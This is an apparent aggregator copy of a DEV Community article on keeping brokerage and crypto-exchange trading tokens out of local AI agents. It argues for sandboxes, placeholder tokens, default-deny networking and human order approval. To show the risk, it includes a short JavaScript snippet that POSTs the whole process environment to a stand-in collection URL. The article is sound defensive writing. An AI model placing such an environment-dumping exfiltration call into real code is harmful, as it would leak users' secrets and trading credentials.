惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

WordPress大学
WordPress大学
Cyberwarzone
Cyberwarzone
The GitHub Blog
The GitHub Blog
云风的 BLOG
云风的 BLOG
P
Proofpoint News Feed
小众软件
小众软件
Recent Announcements
Recent Announcements
博客园 - 三生石上(FineUI控件)
Security Archives - TechRepublic
Security Archives - TechRepublic
W
WeLiveSecurity
Cloudbric
Cloudbric
博客园 - 司徒正美
美团技术团队
N
News and Events Feed by Topic
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
PCI Perspectives
PCI Perspectives
宝玉的分享
宝玉的分享
H
Help Net Security
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Google DeepMind News
Google DeepMind News
Help Net Security
Help Net Security
Last Week in AI
Last Week in AI
S
Schneier on Security
N
News | PayPal Newsroom
B
Blog RSS Feed
L
LINUX DO - 最新话题
T
Troy Hunt's Blog
S
Secure Thoughts
雷峰网
雷峰网
aimingoo的专栏
aimingoo的专栏
L
Lohrmann on Cybersecurity
G
Google Developers Blog
Microsoft Azure Blog
Microsoft Azure Blog
Hacker News - Newest:
Hacker News - Newest: "LLM"
T
Tenable Blog
S
Securelist
L
LangChain Blog
Recent Commits to openclaw:main
Recent Commits to openclaw:main
I
InfoQ
H
Heimdal Security Blog
Cisco Talos Blog
Cisco Talos Blog
F
Full Disclosure
Y
Y Combinator Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
K
Kaspersky official blog
T
Tailwind CSS Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
阮一峰的网络日志
阮一峰的网络日志
C
Cisco Blogs

DEV Community

Authentication Security Deep Dive: From Brute Force to Salted Hashing (With Java Examples) Why AI Systems Don’t Fail — They Drift Spilling beans for how i learn for exam😁"Reinforcement Learning Cheat Sheet" I Replaced Chrome with Safari for AI Browser Automation. Here's What Broke (and What Finally Worked) How Python Borrows Other People's Work The $40 Architecture: Processing 1 Billion API Requests with 99.99% Uptime Vibe Coding: A Workflow Guide (From Zero to SaaS) Most webhook security guides protect the wrong side. The scary part is delivery. Headless CMS for TanStack Start: Build a Blog with Cosmic EU Age Verification App "Hacked in 2 Minutes" — What Actually Happened Comfy Cloud’s delete function does not actually remove files Running AI Models on GPU Cloud Servers: A Beginner Guide Event-driven media intelligence with AWS Step Functions and Bedrock I scored 500 AI prompts across 8 quality dimensions — here's what broke How to Call Google Gemini API from Next.js (Free Tier, No Backend Needed) The Portal Protocol: Reclaiming Human Connection in the Age of AI How to Fix Your Team's Scattered Knowledge Problem With a Self-Hosted Forum Intro to tc Cloud Functors: A Graph-First Mental Model for the Modern Cloud Designing Multi-Tenant Backends With Both Ownership and Team Access I Built a Neumorphic CSS Library with 77+ Components — Here's What I Learned PostgreSQL Performance Optimization: Why Connection Pooling Is Critical at Scale Cómo construí un SaaS multi-rubro para gestionar expensas en Argentina con FastAPI + Vue 3 🚀 I Built an Ethical Hacking Scanner Tool – Open Source Project I Replaced /usage and /context in Claude Code With a Single Statusline A Pythonic Way to Handle Emails (IMAP/SMTP) with Auto-Discovery and AI-Ready Design I Collected 8.9 Million Polymarket Price Points — Here's What I Found About How Markets Really Move EcoTrack AI — Carbon Footprint Tracker & Dashboard Everyone's Using AI. No One Agrees How. 5 self-hosted ebook managers worth trying in 2026 Building Your First AI Agent with LangChain: From Chatbot to Autonomous Assistant Common SOC 2 Failures (Real World) Stop Vibe-Checking Your AI App: A Practical Guide to Evals How to Use SonarQube and SonarScanner Locally to Level Up Your Code Quality Your Next To-Do App Is Dead — I Replaced Mine with an OpenClaw AI Sign a Nostr event in 60 lines of Python using coincurve — no nostr-sdk, no nbxplorer, no rust toolchain ITGC Audit Explained Like You’re in Big 4 Patch Tuesday abril 2026: Microsoft parcha 163 vulnerabilidades y un zero-day en SharePoint Stop scraping everything: a better way to track competitor price changes Listing on MCPize + the Official MCP Registry while routing payments OUTSIDE the marketplace — how I kept 100% of my x402 revenue Building an AI-Powered Risk Intelligence System Using Serverless Architecture Why We Ripped Function Overloading Out of Our AI Toolchain Testing AI-Generated Code: How to Actually Know If It Works SaaS Churn Is Killing Your Business. Here Is What to Do About It (Without a Support Team) The Speed of AI Is No Longer Linear - And Self-Improving Models Are Why How to Implement RBAC for MCP Tools: A Practical Guide for Engineering Teams From Standard Quote to Persuasive Proposal: AI Automation for Arborists I built a CLI that scaffolds complete multi-tenant SaaS apps Axios CVE-2025–62718: The Silent SSRF Bug That Could Be Hiding in Your Node.js App Right Now The dashboard that ended our friendship Data Pipelines Explained Simply (and How to Build Them with Python) The Hidden Cost of AI Systems Nobody Talks About. undefined vs undeclared, and how typeof behaves Switching from file-based jobs to NATS/Kafka in Rust without changing code io_uring Adventures: Rust Servers That Love Syscalls Why Agentic AI is Killing the Traditional Database The POUR principles of web accessibility for developers and designers Quantum Neural Network 3D — A Deep Dive into Interactive WebGL Visualization How To Install Caveman In Codex On macOS And Windows Automation Pipeline Reliability: Why Your Workflow Breaks When Nobody Is Watching I Built an 'Open World' AI Coding Agent — It Works From ANY Folder From Freelancing to Product: A Tech Service Company's SaaS Transformation China's AI Giants: Adding Tencent Hunyuan & ByteDance Doubao to AI University (74 Providers) On the Vibe Coders and Their Lies clerk: Auto-Summarize Your Claude Code Sessions AI Weekly — 2026/04/10–04/17 | The Model Lockdown Is Here, but the Toolchain Is the Real Battleground AI 週報 — 2026/04/10–2026/04/17 模型封鎖潮來了,但工具鏈才是真戰場 Maybe this is how Open-Source apps are born... 🚀 Fine-Tune LLMs with LoRA and QLoRA: 2026 Guide tRPC v11 + Next.js App Router: End-to-End Type Safety Without the Boilerplate ShadCN UI in 2026: Why I Stopped Installing Component Libraries and Started Owning My Components SaaS Billing in React Server Components: Stripe + Supabase Without a Single `useEffect` Join our DEV Weekend Challenge — $1,000 in Prizes Across TEN winners! Submissions Due April 20 at 6:59 AM UTC. Implementing FSRS Spaced Repetition in Flutter + Supabase — Adding Memory Science to an AI Learning App "I Texted My Localhost From the Train — Claude Code Fixed the Bug Before I Got Home" I Built a Sales Prep AI and It Went Deeper Than Expected Design to Code #2: One JSON, Eleven Outputs Solving the 100M-Row Problem: A Summary Table Pattern for High-Volume Push Notification Logs Flutter Web With Wasm: What Actually Changes For Developers I Built 50 Royalty-Free Soundtracks for My Side Project in a Weekend Using AI Music Generation The Vibe Coding Security Checklist: 7 Things to Check Before You Ship Stop Letting Googlebot Guess Fix Your React App's SEO Right Desconstruindo o Streaming do LinkedIn: Como Criar um Engine de Extração de Vídeo de Alta Performance com HLS e FFmpeg (EDA Part-1) EDA (Exploratory Data Analysis) Explained With Real Life — Why Looking at Your Data Is the Most Important Step in Machine Learning Brand Relationship Management at Scale: Our 4-Touch Outreach System for 200+ Brands Why String.fromEnvironment() Might Return an Empty String in Dart JGuardrails 1.0.0 — Hardening Java LLM Apps Against Jailbreaks, Toxicity, and Prompt Injection Plan and Schedule a Full Week of Threads Content From One Claude Conversation Coding Cat Oran Ep3, Five Tables Changed Everything Updated: BFF Pattern I'm done watching freelancers get buried by 200 proposals. So I'm building the alternative. This is my first post BFS Algorithm in Java Step by Step Tutorial with Examples Tracking LLM Pricing Monthly: An Open Dataset for 22 AI Models How We Measure Content ROI on a Comparison Site: Revenue Attribution Without Perfect Data Introducing Nova AI Ops: The AI-Native Operating System for SRE Teams I built a free desktop video downloader for Windows — Grabbit How Talkie OCR Helps Vision-Impaired & Dyslexic Users Read the World Around Them VRCFaceTracking安装和iPhone面捕配置教程,有bug Even CrowdStrike Can't See Your Agents The Automation Gold Rush: What n8n Workflows and Claude Are Opening Up for Developers Right Now
Don't Put Your Brokerage Key Inside an AI Agent
rednakta · 2026-05-18 · via DEV Community

If your LLM key leaks, you get a bill.

If your trading token leaks, orders can happen.

That one difference changes the entire security model for OpenClaw, Hermes, and every local AI agent you connect to Alpaca, Interactive Brokers, Tradier, Coinbase, Kraken, or any other API that can touch a portfolio. The agent is no longer just a local assistant that writes code. It is sitting near account data, balances, positions, order tickets, cancellation flows, and, in crypto, 24/7 execution.

So the real question is not "can the model pick good trades?"

The first question is:

How do you let an AI agent help with trading without letting it hold the token that can trade?

My answer is simple: do not put the real trading token inside the agent. Do not rely on the agent to handle it carefully. Design the runtime so that even if the agent, a plugin, a skill, or an MCP server is compromised, there is no real trading token there to steal.

The Answer: Four Boundaries Before Live Trading

If you want OpenClaw or Hermes anywhere near a brokerage or Bitcoin trading workflow, start with these four boundaries.

  1. Execution boundary: the agent, plugins, skills, package installs, and MCP servers run only inside an isolated environment.
  2. Token boundary: the real brokerage or exchange token never exists inside the agent process.
  3. Network boundary: outbound traffic is denied by default, and only approved LLM, brokerage, and exchange endpoints are allowed through a boundary proxy.
  4. Order boundary: the agent proposes orders; a human or a separate approval policy authorizes execution.

With those boundaries, a bad plugin or confused model can still waste time. It should not be able to drain secrets, spray account data across the internet, or place a live order by itself.

Without them, generated code and financial authority sit in the same room. That is the part to fix.

Why This Became Urgent

Local AI agents fit trading workflows almost too well.

They can summarize pre-market news, read filings and earnings notes, scan watchlists, write strategy code, run backtests, inspect a portfolio, and produce an order candidate. API-enabled brokers already exist. Crypto exchanges already have mature trading APIs. OpenClaw can run local tools. Hermes can turn repeated workflows into reusable skills and memory.

For a developer, the workflow is obvious:

news -> screening -> strategy code -> account lookup -> order candidate

Enter fullscreen mode Exit fullscreen mode

So the first prototype often starts with a .env file:

ALPACA_API_KEY=...
ALPACA_SECRET_KEY=...
TRADIER_ACCESS_TOKEN=...
IBKR_SESSION_TOKEN=...
COINBASE_API_KEY=...
COINBASE_API_SECRET=...
KRAKEN_API_KEY=...
KRAKEN_PRIVATE_KEY=...

Enter fullscreen mode Exit fullscreen mode

Then OpenClaw or Hermes is launched from that same shell.

That is the moment the useful trading assistant becomes a security problem. The same environment that makes experimentation easy also gives generated code, installed packages, MCP servers, and debugging scripts a path to the credentials.

The Core Problem Is Not That AI Might Be Wrong

Most people frame AI trading risk like this:

What if the model makes a bad trade?

That matters. But it is not the first security problem.

The first security problem is where execution authority lives.

OpenClaw, Hermes, Claude Code, Cursor, and MCP-based tools do not merely answer questions. They create files, install packages, run shell commands, call tools, and connect external services. In a trading setup, the user naturally asks things like:

  • "Find an Alpaca API example and wire it into this strategy."
  • "Build a Tradier order plugin."
  • "Write an Interactive Brokers adapter for this portfolio script."
  • "Install this GitHub repo's crypto trading skill."
  • "Add a Bitcoin execution MCP server."
  • "Backtest this and connect it to live orders."

Those requests are useful. They are also all versions of the same security event:

Run code from the model or the internet on my machine, with my permissions, next to tokens that can affect my account.

So the question is not whether the AI is smart. The question is: when the AI fails, what can it still touch?

Why .env Is the Wrong Shape for Financial Agents

For ordinary application development, .env is convenient. It is fast, familiar, and most API examples use it.

For local AI agents, it is too broad.

Environment variables are easy for the process and its child processes to read. The agent's generated scripts, installed packages, MCP servers, and one-off debugging code can all end up with access to the same values.

Malicious code does not need a sophisticated exploit.

console.log(process.env);

Enter fullscreen mode Exit fullscreen mode

Or, more quietly:

await fetch("https://example.invalid/collect", {
  method: "POST",
  body: JSON.stringify(process.env),
});

Enter fullscreen mode Exit fullscreen mode

If an LLM key leaks this way, you may get a painful bill. If a brokerage or exchange token leaks this way, the exposure can include balances, positions, trading strategy, and order capability. For Bitcoin, the risk is sharper: markets run all day, orders execute immediately, and badly scoped exchange credentials may also include withdrawal authority.

Trading tokens are not app settings.

A trading token may look like another environment variable, but it is really an entry point into portfolio data and execution. In an AI-agent runtime that installs and runs code, it should not be treated like a normal developer API key.

A Separate Machine Does Not Solve the Token Problem

Running the agent on a spare laptop, a Mac mini, a NAS, or a cheap cloud box feels safer. It separates the agent from your main laptop.

That helps with one class of damage: the agent is less likely to touch your personal files.

It does not solve the trading-token problem.

If the separate machine contains the real Alpaca, Interactive Brokers, Tradier, Coinbase, Kraken, or Binance-style token, and the agent installs plugins and runs generated code on that machine, the core problem remains. You moved the risk to another box. You did not create another trust domain.

The useful questions are different:

  • Can the agent read the real trading token?
  • Can generated code send account data to an unknown server?
  • Is paper trading separated from live trading?
  • Is Bitcoin trading authority separated from withdrawal authority?
  • Does a human approve the final order API call?
  • Can you audit which tool produced which order candidate?

For financial agents, location is not enough. Authority has to be split.

The Architecture That Actually Fits

A safer local trading assistant separates the system like this:

Area Role Real token access
AI agent sandbox Research, strategy code, backtests, order candidates No
Trading adapter Shapes requests for Alpaca, IBKR, Tradier, Coinbase, Kraken, etc. No, or placeholders only
Boundary proxy Allows approved APIs, injects real tokens, records logs Yes
Approval step Reviews order candidate, amount, symbol, timing, and risk limits Execution approval
Audit log Records what was requested, why, when, and through which tool Never stores tokens

This does not make the agent less useful. The agent can still read research, write code, summarize positions, and propose trades.

What changes is authority. The agent no longer owns the final financial capability.

1. Run the Agent Inside a Sandbox

OpenClaw or Hermes does not need your whole home directory, SSH keys, browser profile, password manager exports, or personal documents. For a trading workflow, it usually needs one working directory for strategy code, data, and generated reports.

A better default:

  • Run the agent inside a VM-grade sandbox.
  • Make the host filesystem invisible by default.
  • Map only the specific strategy or data directory the agent needs.
  • Install plugins, skills, packages, and MCP servers inside the sandbox.
  • If the environment acts strangely, discard it and start a fresh one.

This works because a malicious skill cannot steal files it cannot see. "Manage permissions carefully" is weaker than making the rest of the host absent from the agent's world.

2. Keep the Real Token Outside the Agent

This is the most important boundary.

Financial tokens should not live in the agent's environment variables, config files, local databases, notebooks, or logs. The agent may need to construct a request, but it should not be able to read the real secret.

Use placeholders inside the agent:

ALPACA_API_KEY=ALPACA_API_KEY
ALPACA_SECRET_KEY=ALPACA_SECRET_KEY
COINBASE_API_KEY=COINBASE_API_KEY
KRAKEN_API_KEY=KRAKEN_API_KEY

Enter fullscreen mode Exit fullscreen mode

The agent builds a normal-looking request:

Authorization: Bearer ALPACA_API_KEY

Enter fullscreen mode Exit fullscreen mode

The real substitution happens outside the sandbox, at the boundary proxy. The agent's world contains only placeholders. If a malicious skill dumps the environment, it gets strings that do not trade.

nilbox calls this pattern Zero Token Architecture, but the principle matters more than the name:

Do not hide the token better. Remove the real token from the untrusted execution environment.

3. Make Networking Default-Deny

Keeping the token out of the agent is necessary, but not sufficient. Account snapshots, strategy files, order candidates, and execution logs can leak even without the token.

The network policy should be boring:

  • Block all outbound connections by default.
  • Allow only explicit LLM endpoints, brokerage endpoints, and exchange endpoints.
  • Force every external request through a boundary proxy.
  • Log destination, method, time, tool name, and whether the request is order-related.
  • Fail closed when the agent tries to reach an unknown domain.

The point is not to make the agent unusable. The point is to allow what the workflow needs and deny everything else. For financial automation, default-allow networking is the wrong default.

4. Let the Agent Propose Orders, Not Execute Them

Fully autonomous trading is tempting. It is also the wrong first version for a general-purpose agent.

Start with order proposals:

  • The agent creates an order candidate.
  • The candidate includes symbol, side, quantity, order type, price or limit, rationale, and maximum expected loss.
  • For Bitcoin, include venue, pair, fee estimate, slippage assumption, and confirmation that withdrawal permissions are disabled.
  • A human reviews and approves the order.
  • Only approved orders are forwarded by the boundary proxy.
  • Large orders, abnormal sizes, after-hours equity trades, and volatile crypto conditions require extra confirmation.

This preserves the useful part of the AI workflow: faster research, clearer proposals, less repetitive glue code. It removes the dangerous part: giving a general-purpose agent direct final authority over live execution.

Practical Checklist

Before connecting an AI agent to financial APIs, pass this checklist.

  • Start with paper trading, sandbox accounts, or read-only credentials.
  • Do not put real brokerage or exchange tokens inside the agent runtime.
  • Keep secrets out of .env, shell history, logs, notebooks, and generated files.
  • Limit the agent to one working directory.
  • Install plugins, skills, and MCP servers only inside the sandbox.
  • Default-deny external networking and allow only necessary destinations.
  • Send order API calls only through the boundary proxy.
  • Require human approval before live orders.
  • Add daily limits for notional value, order count, symbols, and strategy scope.
  • Disable crypto withdrawal permissions on trading API keys.
  • Document token revocation and rotation before going live.

The first two items matter most. If the architecture is wrong in paper trading, the same flaw will follow you into live trading.

Where nilbox Fits

nilbox is not the main character of this story. The main character is the boundary between AI-generated code and financial authority.

nilbox is one way to implement that boundary locally. It runs agents and MCP servers inside a VM-based sandbox, hides the host filesystem by default, keeps real tokens outside the sandbox through Zero Token Architecture, and routes network access through a controllable boundary.

That means the problem nilbox addresses is not "make AI better at trading." It is narrower and more important:

Do not put code generated or installed by an AI agent in the same trust domain as the token that can trade.

Use nilbox, build your own VM and proxy setup, or use another hardened runtime. The conclusion is the same: design the boundary before you connect the account.

Closing

Local AI agents are a natural fit for trading workflows. They can read research, write strategy code, run backtests, summarize portfolios, and prepare order candidates.

But once a brokerage or exchange API enters the loop, the system is no longer simple automation. It is financial infrastructure.

The standard should be:

If the agent is compromised, the real trading token and final order authority do not leak.

Protecting the LLM key matters. Protecting the trading token matters more. One creates usage cost. The other can move money.


Further reading